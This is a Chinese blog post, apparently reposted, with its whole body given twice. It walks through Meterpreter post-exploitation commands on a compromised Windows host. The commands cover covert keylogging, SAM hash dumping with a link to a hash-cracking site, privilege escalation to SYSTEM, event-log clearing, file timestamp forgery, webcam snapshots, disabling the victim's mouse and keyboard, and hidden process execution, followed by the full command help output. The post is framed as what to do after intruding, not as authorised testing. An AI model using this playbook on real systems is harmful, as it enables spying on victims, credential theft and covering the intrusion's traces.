metasploit获取shell之后进一步利用!metasploit+sessions
2017-09-02 16:56
465 查看
当你用metasploit成功的入侵一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用
当你看到了
[*] Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051)
这就代表这你在目标系统上成功的获得了Meterpreter的Shell
sessions -l 用于查看你控制的电脑
你会看到:
Id Description Tunnel
4 meterpreter x86/win32 server-PC\Administrator @ SERVER-PC 192.168.195.140:4444 -> 192.168.195.1:52540 (192.168.195.1)
注意前面的ID号
你要控制哪台就输入:
meterpreter >sessions -i 4
例如本次案例ID号为:4
meterpreter >sysinfo
显示目标系统信息
meterpreter > backround
退出目标系统,回到Metasploit主界面
meterpreter > ps
显示目标系统上的进程
meterpreter > keyscan_start
keyscan_dump // 查看键盘记录
监控目标系统键盘输入,停止监控为keyscan_stop
meterpreter > migrate
将你的Meterpreter移到另一个进程
先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)
meterpreter > ipconfig
显示对方网络信息
meterpreter > getuid
获取用户的服务器运行
meterpreter > shell
进入目标电脑,命令提示符
meterpreter > Idletime
目标电脑闲置了多长时间
meterpreter > Hashdump
导出对方SAM数据库里的内容,推荐一个hash破解网站:
http://www.objectif-securite.ch/products.php
meterpreter > getsystem
利用已自漏洞,自动提权为SYSTEM
meterpreter > clearev
清除事件日志
meterpreter > execute (某Windows指令)
在对方电脑上运行该指令
meterpreter > execute
Usage: execute -f file [options]
Executes a command on the remote machine.
OPTIONS:
-H Create the process hidden from view.
-a <opt> The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d <opt> The 'dummy' executable to launch when using -m.
-f <opt> The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-k Execute process on the meterpreters current desktop
-m Execute from memory.
-s <opt> Execute process in a given session as the session user
-t Execute process with currently impersonated thread token
meterpreter >timetomp
修改文件时间属性
meterpreter >timestomp c:\\jzking121.txt -c "09/09/1980 12:12:34" 修改文件创建时间
meterpreter > timestomp c:\\jzking121.txt -m "01/01/1991 12:12:34" 修改文件修改时间
meterpreter > timestomp c:\\jzking121.txt -f c:\\RHDSetup.log 讲文件RHDSetup.log属性复制到jzking121文件上面
meterpreter > download(文件路径)
下载文件命令
例如下载C盘下面的jzking121.txt文件
meterpreter > download c:\\jzking121.txt
[*] downloading: c:\jzking121.txt -> jzking121.txt
[*] downloaded : c:\jzking121.txt -> jzking121.txt
注意,文件路径中要有两个\\
Upload指令跟Download指令类似!
meterpreter > shutdown
关闭目标计算机,reboot为重启计算机
meterpreter >screenshot
获取目标电脑,屏幕截图
meterpreter > uictl enable keyboard 启用目标使用键盘
meterpreter > uictl disable mouse 禁止目标使用鼠标
enable 为启用
disable 禁用
meterpreter > webcam_list
目标系统的摄像头列表
meterpreter > webcam_snap
从指定的摄像头,拍摄照片
meterpreter > search -d c:\\ -f 1.jpg
搜索目标电脑,C盘1.jpg文件
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
当你看到了
[*] Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051)
这就代表这你在目标系统上成功的获得了Meterpreter的Shell
sessions -l 用于查看你控制的电脑
你会看到:
Id Description Tunnel
4 meterpreter x86/win32 server-PC\Administrator @ SERVER-PC 192.168.195.140:4444 -> 192.168.195.1:52540 (192.168.195.1)
注意前面的ID号
你要控制哪台就输入:
meterpreter >sessions -i 4
例如本次案例ID号为:4
meterpreter >sysinfo
显示目标系统信息
meterpreter > backround
退出目标系统,回到Metasploit主界面
meterpreter > ps
显示目标系统上的进程
meterpreter > keyscan_start
keyscan_dump // 查看键盘记录
监控目标系统键盘输入,停止监控为keyscan_stop
meterpreter > migrate
将你的Meterpreter移到另一个进程
先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)
meterpreter > ipconfig
显示对方网络信息
meterpreter > getuid
获取用户的服务器运行
meterpreter > shell
进入目标电脑,命令提示符
meterpreter > Idletime
目标电脑闲置了多长时间
meterpreter > Hashdump
导出对方SAM数据库里的内容,推荐一个hash破解网站:
http://www.objectif-securite.ch/products.php
meterpreter > getsystem
利用已自漏洞,自动提权为SYSTEM
meterpreter > clearev
清除事件日志
meterpreter > execute (某Windows指令)
在对方电脑上运行该指令
meterpreter > execute
Usage: execute -f file [options]
Executes a command on the remote machine.
OPTIONS:
-H Create the process hidden from view.
-a <opt> The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d <opt> The 'dummy' executable to launch when using -m.
-f <opt> The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-k Execute process on the meterpreters current desktop
-m Execute from memory.
-s <opt> Execute process in a given session as the session user
-t Execute process with currently impersonated thread token
meterpreter >timetomp
修改文件时间属性
meterpreter >timestomp c:\\jzking121.txt -c "09/09/1980 12:12:34" 修改文件创建时间
meterpreter > timestomp c:\\jzking121.txt -m "01/01/1991 12:12:34" 修改文件修改时间
meterpreter > timestomp c:\\jzking121.txt -f c:\\RHDSetup.log 讲文件RHDSetup.log属性复制到jzking121文件上面
meterpreter > download(文件路径)
下载文件命令
例如下载C盘下面的jzking121.txt文件
meterpreter > download c:\\jzking121.txt
[*] downloading: c:\jzking121.txt -> jzking121.txt
[*] downloaded : c:\jzking121.txt -> jzking121.txt
注意,文件路径中要有两个\\
Upload指令跟Download指令类似!
meterpreter > shutdown
关闭目标计算机,reboot为重启计算机
meterpreter >screenshot
获取目标电脑,屏幕截图
meterpreter > uictl enable keyboard 启用目标使用键盘
meterpreter > uictl disable mouse 禁止目标使用鼠标
enable 为启用
disable 禁用
meterpreter > webcam_list
目标系统的摄像头列表
meterpreter > webcam_snap
从指定的摄像头,拍摄照片
meterpreter > search -d c:\\ -f 1.jpg
搜索目标电脑,C盘1.jpg文件
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
相关文章推荐
- metasploit获取shell之后进一步利用!metasploit+sessions
- metasploit获取shell之后进一步利用!metasploit+sessions
- 利用oracle反弹SHELL 获取windows服务器权限
- PHP下利用shell后台运行PHP脚本,并获取该脚本的Process ID的代码
- 利用shell脚本自动获取awr报表
- Android利用adb shell命令获取屏幕的点击坐标之横屏竖屏的区别
- 利用Shell命令获取IP地址
- PHP下利用shell后台运行PHP脚本,并获取该脚本的Process ID的代码
- 利用WiFi Pineapple Nano渗透客户端获取SHELL
- Android利用 libsuperuse执行shell命令或获取root权限
- 利用shell获取指定日期前N天的日期
- metasploit利用vsftpd漏洞获取root权限
- 当Linux提权不能反弹Shell时利用metasploit进行提权
- 【转载】利用shell脚本获取一个文件的绝对路径readlink
- 利用shell获取指定日期前N天的日期
- 利用shell 生成 hadoop 实验大数据 以及如何获取时间戳
- office漏洞利用--获取shell
- iOS8之后利用storyboard、xib动态获取行高
- 利用DoDataExchange函数获取Edit控件的文本信息
- shell命令使用sed获取ip命令